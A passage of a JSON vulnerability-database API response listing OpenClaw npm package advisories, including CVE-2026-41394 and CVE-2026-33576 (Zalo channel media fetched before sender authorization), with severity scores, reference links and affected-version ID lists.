                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:51:37Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mhgq-xpfq-6r66"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41394",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41394"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthorized-operator-scope-access-in-unauthenticated-plugin-auth-routes",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:51:37Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-unauthorized-operator-scope-access-in-unauthenticated-plugin-auth-routes"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-mhgq-xpfq-6r66",
                    "reference_id": "GHSA-mhgq-xpfq-6r66",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-mhgq-xpfq-6r66"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41394",
                "GHSA-mhgq-xpfq-6r66"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "7.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4hz5-f2pw-3yb4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90990?format=api",
            "vulnerability_id": "VCID-4jwj-6s5z-wbeq",
            "summary": "OpenClaw: Zalo channel downloads media before sender authorization\n## Summary\n\nThe Zalo image path fetched and stored inbound media before the DM/pairing authorization checks ran.\n\n## Impact\n\nUnauthorized senders could force network fetches and disk writes in the inbound media store even when the message itself was rejected.\n\n## Affected Component\n\n`extensions/zalo/src/monitor.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix for this issue; this record lists `2026.3.28` as still affected by other vulnerabilities.\n\n## Fix\n\nFixed by commit `68ceaf7a5f` (`zalo: gate image downloads before DM auth`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33576",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00017",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04589",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00017",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04575",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0499",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33576"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/68ceaf7a5f64a23e78b95eff055e4b497218312a",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-02T15:11:13Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/68ceaf7a5f64a23e78b95eff055e4b497218312a"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v2v2-f783-358j",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-02T15:11:13Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v2v2-f783-358j"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33576",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33576"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthorized-media-download-via-zalo-channel",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-02T15:11:13Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-unauthorized-media-download-via-zalo-channel"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-v2v2-f783-358j",
                    "reference_id": "GHSA-v2v2-f783-358j",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-v2v2-f783-358j"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-33576",
                "GHSA-v2v2-f783-358j"
            ],
            "risk_score": 4.4,
            "exploitability": "0.5",
            "weighted_severity": "8.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4jwj-6s5z-wbeq"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91654?format=api",
            "vulnerability_id": "VCID-4nwq-14y4-xkhp",
